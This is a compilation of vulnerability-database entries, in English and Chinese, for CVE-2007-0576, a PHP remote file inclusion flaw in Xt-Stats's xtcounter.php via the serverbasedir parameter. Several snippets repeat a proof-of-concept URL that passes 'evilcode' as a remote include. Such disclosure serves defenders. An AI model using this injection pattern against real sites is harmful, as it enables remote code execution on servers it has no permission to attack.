Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Include (RFI) Vulnerability

No description provided by source. Download:http://www.xt-scripts.com/index.php?dl=32 Finded by ThE dE@Th Greetz For :AsB-May Team & HaCk.eGy xtcounter.php: require $serverbasedir.'management/sources/counterclass.php'; http://www.site.com/path/xtcounter.php?serverbasedir=evilcode milw0rm.com...

XT-Stats XT_Counter.PHP远程文件包含漏洞

XT-Stats是一款基于PHP的WEB应用程序。 XT-Stats不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'XTCounter.PHP'脚本对用户提交的'serverbasedir'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 xt-scripts xt-stats 2.4 .b3 目前没有解决方案提供,请关注以下链接： http://www.xt-scripts.com/index.php?p=0...

Remote file inclusion

PHP remote file inclusion vulnerability in xtcounter.php in Xt-Stats 2.3.x up to 2.4.0.b3 allows remote attackers to execute arbitrary PHP code via a URL in the serverbasedir parameter...

CVE-2007-0576

PHP remote file inclusion vulnerability in xtcounter.php in Xt-Stats 2.3.x up to 2.4.0.b3 allows remote attackers to execute arbitrary PHP code via a URL in the serverbasedir parameter...

CVE-2007-0576

The CVE-2007-0576 entry describes a PHP remote file inclusion vulnerability in Xt-Stats 2.3.x up to 2.4.0.b3, exploitable via a URL in the server_base_dir parameter of xt_counter.php. This allows remote attackers to execute arbitrary PHP code on vulnerable installations. The affected software is ...

Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion

Download:http://www.xt-scripts.com/index.php?dl=32 Finded by ThE dE@Th Greetz For :AsB-May Team & HaCk.eGy xtcounter.php: require $serverbasedir.'management/sources/counterclass.php'; http://www.site.com/path/xtcounter.php?serverbasedir=evilcode milw0rm.com 2007-01-27...

Xt-Stats 2.4.0.b3 (server_base_dir) - Remote File Inclusion

Xt-Stats 2.4.0.b3 serverbasedir - Remote File Inclusion Download:http://www.xt-scripts.com/index.php?dl=32 Finded by ThE dE@Th Greetz For :AsB-May Team & HaCk.eGy xtcounter.php: require $serverbasedir.'management/sources/counterclass.php';...